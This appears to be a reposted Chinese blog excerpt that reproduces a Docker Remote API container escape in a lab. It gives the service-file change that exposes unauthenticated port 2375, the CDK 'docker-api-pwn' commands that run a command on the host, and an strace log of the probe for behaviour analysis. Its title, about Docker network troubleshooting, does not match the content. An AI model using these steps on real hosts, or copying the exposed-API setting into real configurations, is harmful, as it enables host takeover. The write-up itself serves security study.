docker 无法访问网络 docker0 重置 docker 2375 无法访问

转载

mob6454cc69d373 2024-07-05 11:41:51

文章标签 docker 容器运维 TCP 云计算 文章分类 Docker 云计算

ubuntu 20.04
docker 23.0.2

打开docker远程访问API：

打开/usr/lib/systemd/system/docker.service文件，在[service]的ExeStart=...后面追加：

-H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

即：ExecStart=/usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

重启生效

systemctl daemon-reload # 重新加载配置文件
systemctl restart docker

运行攻击容器：

docker run --rm -it --name=docker-api-pwn -v /root/cdk:/cdk ubuntu:20.04 bash

利用：

in container

./cdk run docker-api-pwn http://127.0.0.1:2375 “touch /host/tmp/docker-api-pwn” #ip地址改为宿主机地址或在创建容器时使用host网络
ls /tmp/docker-api-pwn

效果：宿主机上出现/tmp/docker-api-pwn文件，完成远程任意命令执行，逃逸成功。

五、漏洞行为数据分析

检查Docker Remote API是否开启。

264 01:39:19.448323 rt_sigreturn({mask=[]}) = 3 <0.000016>
 264 01:39:19.448394 socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, IPPROTO_IP) = 3 <0.000020>
 264 01:39:19.448443 connect(3, {sa_family=AF_INET, sin_port=htons(2375), sin_addr=inet_addr(“172.31.102.241”)}, 16) = -1 EINPROGRESS (Operation now in progress) <0.000269>
 264 01:39:19.448791 epoll_ctl(4, EPOLL_CTL_ADD, 3, {EPOLLIN|EPOLLOUT|EPOLLRDHUP|EPOLLET, {u32=293859544, u64=140458609340632}}) = 0 <0.000010>
 264 01:39:19.448845 epoll_pwait(4, [{EPOLLOUT, {u32=293859544, u64=140458609340632}}], 128, 0, NULL, 0) = 1 <0.000017>
 264 01:39:19.448922 getsockopt(3, SOL_SOCKET, SO_ERROR, [0], [4]) = 0 <0.000009>
 264 01:39:19.448962 getpeername(3, {sa_family=AF_INET, sin_port=htons(2375), sin_addr=inet_addr(“172.31.102.241”)}, [112->16]) = 0 <0.000009>
 264 01:39:19.449007 getsockname(3, {sa_family=AF_INET, sin_port=htons(40088), sin_addr=inet_addr(“172.17.0.4”)}, [112->16]) = 0 <0.000009>
 264 01:39:19.449049 setsockopt(3, SOL_TCP, TCP_NODELAY, [1], 4) = 0 <0.000009>
 264 01:39:19.449085 setsockopt(3, SOL_SOCKET, SO_KEEPALIVE, [1], 4) = 0 <0.000009>
 264 01:39:19.449120 setsockopt(3, SOL_TCP, TCP_KEEPINTVL, [30], 4) = 0 <0.000009>
 264 01:39:19.449156 setsockopt(3, SOL_TCP, TCP_KEEPIDLE, [30], 4) = 0 <0.000009>
 264 01:39:19.449263 read(3, 0xc0001a8000, 4096) = -1 EAGAIN (Resource temporarily unavailable) <0.000010>
 264 01:39:19.449352 write(3, “GET /info HTTP/1.1\r\nHost: 172.31”…, 136) = 136 <0.004713>
 264 01:39:19.454111 epoll_pwait(4, [], 128, 0, NULL, 0) = 0 <0.000009>
 264 01:39:19.454152 epoll_pwait(4, <unfinished …>
 265 01:39:19.458155 <… nanosleep resumed>NULL) = 0 <0.010050>
 265 01:39:19.458187 futex(0xe91c20, FUTEX_WAIT_PRIVATE, 0, {tv_sec=60, tv_nsec=0} <unfinished …>
 264 01:39:19.471125 <… epoll_pwait resumed>[{EPOLLIN|EPOLLOUT, {u32=293859544, u64=140458609340632}}], 128, -1, NULL, 0) = 1 <0.016960>
 264 01:39:19.471182 futex(0xe91c20, FUTEX_WAKE_PRIVATE, 1) = 1 <0.000012>
 265 01:39:19.471213 <… futex resumed>) = 0 <0.013009>
 265 01:39:19.471229 sched_yield() = 0 <0.000010>
 265 01:39:19.471261 futex(0xe91b38, FUTEX_WAIT_PRIVATE, 2, NULL <unfinished …>

本文章为转载内容，我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题，欢迎原作者联系我们进行内容更正或删除文章。